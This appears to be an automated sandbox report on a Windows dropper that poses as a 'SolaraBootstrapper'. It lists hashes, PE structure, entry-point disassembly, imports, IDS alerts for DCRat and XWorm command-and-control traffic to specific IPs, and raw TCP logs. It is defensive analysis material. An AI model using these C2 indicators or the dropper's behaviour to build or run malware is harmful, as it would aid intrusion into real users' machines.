Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1776
Entropy (8bit):	3.5480492848009324
Encrypted:	false
SSDEEP:	24:AHq6saJQXQK6zkp5nFC3xtKEcfyNodeI5nFC3udee:6s/Xv6zklC3aEoy+de2C3udee
MD5:	7264ED58A430BF80CED4FE4977A81ABE
SHA1:	AC73A7FC9C993F27494651FD56FC9289F5C54F03
SHA-256:	3BECF43647028907B5DF24E41012AD21AD4CBFC3DC639C73BA7219B5241EE269
SHA-512:	688723E77658A9032D807BF8FBA514B246EA2B7A9E371BA1F6C7DF2BAF4DBA831AED5586CA149AE29C85427EF1592238E9516BD309D47B328D65D73D75DF9C33
Malicious:	false
Preview:	,gg, .. i8""8i ,dPYb, .. `8,,8' IP'`Yb .. `88' I8 8I .. dP"8, I8 8' .. dP' `8a ,ggggg, I8 dP ,gggg,gg ,gggggg, ,gggg,gg .. dP' `Yb dP" "Y8gggI8dP dP" "Y8I dP""""8I dP" "Y8I .._ ,dP' I8 i8' ,8I I8P i8' ,8I ,8' 8I i8' ,8I .."888,,____,dP,d8, ,d8' ,d8b,_ ,d8, ,d8b,,dP Y8,,d8, ,d8b,..a8P"Y88888P" P"Y8888P" 8P'"Y88P"Y8888P"`Y88P `Y8P"Y8888P"`Y8.. .. .. .. ..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.880492453213229
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% InstallShield setup (43055/19) 0.21% Win32 Executable Delphi generic (14689/80) 0.07% Windows Screen Saver (13104/52) 0.07%
File name:	Vjy8d2EoqK.exe
File size:	8'422'912 bytes
MD5:	a0936899fbf31493bbe5e34dc18a9341
SHA1:	1634a9e1759962db670bf244b1b3f5a9e71a25d7
SHA256:	b27cdbd5705c56034999011911997559d5eecb66e2e0d8b8c9aa843fe05d1627
SHA512:	1916ca8eda84abec46cc6a932d350b5baeaa7b46876c6788f670d418157dcc3e18c73fe884100489b6b294e37e899c39442485ee1de2cd1f4b12ef8793f5e562
SSDEEP:	98304:ppzdbM+Q2y+aq02EPzxjOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbiEJ1nL2hBnI:pDf07JOjmFQR4MVGFtwLPsnL2hVGBZ
TLSH:	138612017F408EA1F0195677C1DF82048B74A9112BA6D71FBAA9337D5A233937C1EADB
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4020cc
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d59a4a699610169663a929d37c90be43

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov ecx, 0000000Ch
push 00000000h
push 00000000h
dec ecx
jne 00007F5C20B4E8FBh
push ecx
push ebx
push esi
push edi
mov eax, 0040209Ch
call 00007F5C20B4E370h
xor eax, eax
push ebp
push 00402361h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
lea edx, dword ptr [ebp-14h]
mov eax, 00402378h
call 00007F5C20B4E749h
mov eax, dword ptr [ebp-14h]
call 00007F5C20B4E819h
mov edi, eax
test edi, edi
jng 00007F5C20B4EB36h
mov ebx, 00000001h
lea edx, dword ptr [ebp-20h]
mov eax, ebx
call 00007F5C20B4E7D8h
mov ecx, dword ptr [ebp-20h]
lea eax, dword ptr [ebp-1Ch]
mov edx, 00402384h
call 00007F5C20B4DF68h
mov eax, dword ptr [ebp-1Ch]
lea edx, dword ptr [ebp-18h]
call 00007F5C20B4E70Dh
mov edx, dword ptr [ebp-18h]
mov eax, 00404680h
call 00007F5C20B4DE40h
lea edx, dword ptr [ebp-2Ch]
mov eax, ebx
call 00007F5C20B4E7A6h
mov ecx, dword ptr [ebp-2Ch]
lea eax, dword ptr [ebp-28h]
mov edx, 00402390h
call 00007F5C20B4DF36h
mov eax, dword ptr [ebp-28h]
lea edx, dword ptr [ebp-24h]
call 00007F5C20B4E6DBh
mov edx, dword ptr [ebp-24h]
mov eax, 00404684h
call 00007F5C20B4DE0Eh
lea edx, dword ptr [ebp-38h]
mov eax, ebx
call 00007F5C20B4E774h
mov ecx, dword ptr [ebp-38h]
lea eax, dword ptr [ebp-34h]
mov edx, 0040239Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5000	0x302	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9000	0x8063a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0x1c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x7000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x13b8	0x1400	e5913936857bed3b3b2fbac53e973471	False	0.6318359375	data	6.340990548290613	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x3000	0x7c	0x200	cef89de607e490725490a3cd679af6bb	False	0.162109375	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 4230400	1.1176271682252383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x4000	0x695	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5000	0x302	0x400	3d2f2fc4e279cba623217ec9de264c4f	False	0.3876953125	data	3.47731642923935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x6000	0x4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x7000	0x18	0x200	467f29e48f3451df774e13adae5aafc2	False	0.05078125	data	0.1991075177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x8000	0x1c8	0x200	9859d413c7408cb699cca05d648c2502	False	0.876953125	data	5.7832974211095225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x9000	0x8063a8	0x806400	f5af9149d5af6d166aadf2293d37c32d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x936c	0x6d6b2e	PE32+ executable (GUI) x86-64, for MS Windows	0.8784542083740234
RT_RCDATA	0x6dfe9c	0x11c484	PE32 executable (GUI) Intel 80386, for MS Windows	0.49709224700927734
RT_RCDATA	0x7fc320	0x13000	PE32 executable (GUI) Intel 80386, for MS Windows	0.5095985814144737
RT_RCDATA	0x80f320	0x9	ASCII text, with no line terminators	1.8888888888888888
RT_RCDATA	0x80f32c	0xc	ASCII text, with no line terminators	1.6666666666666667
RT_RCDATA	0x80f338	0xa	ISO-8859 text, with no line terminators	1.8
RT_RCDATA	0x80f344	0x1	very short file (no magic)	9.0
RT_RCDATA	0x80f348	0x1	very short file (no magic)	9.0
RT_RCDATA	0x80f34c	0x1	very short file (no magic)	9.0
RT_RCDATA	0x80f350	0x1	very short file (no magic)	9.0
RT_RCDATA	0x80f354	0x1	very short file (no magic)	9.0
RT_RCDATA	0x80f358	0x1	very short file (no magic)	9.0
RT_RCDATA	0x80f35c	0x10	data	1.5
RT_RCDATA	0x80f36c	0x1	very short file (no magic)	9.0
RT_RCDATA	0x80f370	0x38	data	1.0714285714285714

Imports

DLL	Import
kernel32.dll	GetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
kernel32.dll	WriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
shfolder.dll	SHGetFolderPathA
shell32.dll	ShellExecuteA

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-08-05T14:32:59.584377+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49747	80	192.168.2.4	141.8.192.93
2024-08-05T14:32:09.137117+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49733	443	192.168.2.4	140.82.121.4
2024-08-05T14:32:30.632038+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49742	80	192.168.2.4	141.8.192.93
2024-08-05T14:33:59.086310+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49753	80	192.168.2.4	141.8.192.93
2024-08-05T14:33:28.018339+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49750	80	192.168.2.4	141.8.192.93
2024-08-05T14:32:59.511299+0200	TCP	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	49745	27573	192.168.2.4	147.185.221.21
2024-08-05T14:33:10.882003+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49749	80	192.168.2.4	141.8.192.93
2024-08-05T14:33:41.063699+0200	TCP	2034194	ET MALWARE DCRAT Activity (GET)	49752	80	192.168.2.4	141.8.192.93

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 5, 2024 14:32:05.806862116 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:05.806907892 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:05.808017969 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:05.820923090 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:05.820945024 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:06.479603052 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:06.479679108 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:06.486074924 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:06.486085892 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:06.486489058 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:06.527455091 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:06.753016949 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:06.800503016 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.082130909 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.082226992 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.082274914 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.082294941 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.082417011 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.082422972 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.082454920 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.082492113 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.082499027 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.082504988 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.082537889 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.082542896 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.083203077 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.083414078 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.083420038 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.125087976 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.170731068 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.170957088 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.171020031 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.171042919 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.172741890 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.172801018 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.172811985 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.173114061 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.173181057 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.173187971 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.173437119 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.173490047 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.173496008 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.173880100 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.173943996 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.173995018 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.174000978 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.174065113 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.174164057 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.174771070 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.174802065 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.174822092 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.174829006 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.174963951 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.175076008 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.175580978 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.175642014 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.175647974 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.175703049 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.175755024 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.175760984 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.218838930 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.293657064 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.294984102 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.295026064 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.295038939 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.295053005 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.295232058 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.295324087 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.295401096 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.295443058 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.295450926 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.295986891 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.296029091 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.296034098 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.296040058 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.296101093 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.296132088 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.296139002 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.296315908 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.296685934 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.296765089 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.296804905 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.296808958 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.296816111 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.296850920 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.297440052 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.297519922 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.297559023 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.297561884 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.297574997 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.297611952 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.297617912 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.298464060 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.298506975 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.298523903 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.298531055 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.298578024 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.298592091 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.298597097 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.298630953 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.299127102 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.299196959 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.299238920 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.299243927 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.299249887 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.299287081 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.299293041 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300014973 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300055981 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.300065041 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300075054 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300110102 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.300117016 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300187111 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300224066 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300262928 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.300271034 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300550938 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.300797939 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300868034 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300906897 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300908089 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.300918102 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.300946951 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.300956964 CEST	443	49730	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:07.305020094 CEST	49730	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:07.354136944 CEST	49732	443	192.168.2.4	185.199.108.133
Aug 5, 2024 14:32:07.354190111 CEST	443	49732	185.199.108.133	192.168.2.4
Aug 5, 2024 14:32:07.354263067 CEST	49732	443	192.168.2.4	185.199.108.133
Aug 5, 2024 14:32:07.354573965 CEST	49732	443	192.168.2.4	185.199.108.133
Aug 5, 2024 14:32:07.354590893 CEST	443	49732	185.199.108.133	192.168.2.4
Aug 5, 2024 14:32:07.958245993 CEST	443	49732	185.199.108.133	192.168.2.4
Aug 5, 2024 14:32:07.958322048 CEST	49732	443	192.168.2.4	185.199.108.133
Aug 5, 2024 14:32:07.962409019 CEST	49732	443	192.168.2.4	185.199.108.133
Aug 5, 2024 14:32:07.962424994 CEST	443	49732	185.199.108.133	192.168.2.4
Aug 5, 2024 14:32:07.962879896 CEST	443	49732	185.199.108.133	192.168.2.4
Aug 5, 2024 14:32:07.964704037 CEST	49732	443	192.168.2.4	185.199.108.133
Aug 5, 2024 14:32:08.012504101 CEST	443	49732	185.199.108.133	192.168.2.4
Aug 5, 2024 14:32:08.067858934 CEST	443	49732	185.199.108.133	192.168.2.4
Aug 5, 2024 14:32:08.068002939 CEST	443	49732	185.199.108.133	192.168.2.4
Aug 5, 2024 14:32:08.068053961 CEST	49732	443	192.168.2.4	185.199.108.133
Aug 5, 2024 14:32:08.068466902 CEST	49732	443	192.168.2.4	185.199.108.133
Aug 5, 2024 14:32:08.180835962 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:08.180886030 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:08.180993080 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:08.181185961 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:08.181199074 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:08.854175091 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:08.872868061 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:08.872893095 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.137135029 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.137341022 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.137387037 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.137417078 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.137450933 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.137465000 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.137543917 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.137543917 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.137551069 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.138164997 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.138761997 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.138796091 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.138830900 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.138837099 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.139031887 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.227787018 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.228301048 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.228316069 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.229185104 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.229365110 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.229398012 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.229441881 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.229449034 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.229543924 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.229830027 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.230139971 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.230144978 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.230175972 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.230328083 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.230355024 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.230423927 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.230431080 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.231089115 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.231211901 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.231240034 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.231261969 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.231267929 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.231352091 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.232043982 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.232152939 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.232178926 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.232219934 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.232227087 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.232265949 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.318953037 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.319005966 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.319026947 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.319050074 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.319099903 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.319957972 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.320101023 CEST	443	49733	140.82.121.4	192.168.2.4
Aug 5, 2024 14:32:09.320152998 CEST	49733	443	192.168.2.4	140.82.121.4
Aug 5, 2024 14:32:09.320159912 CEST	443	49733	140.82.121.4	192.168.2.4
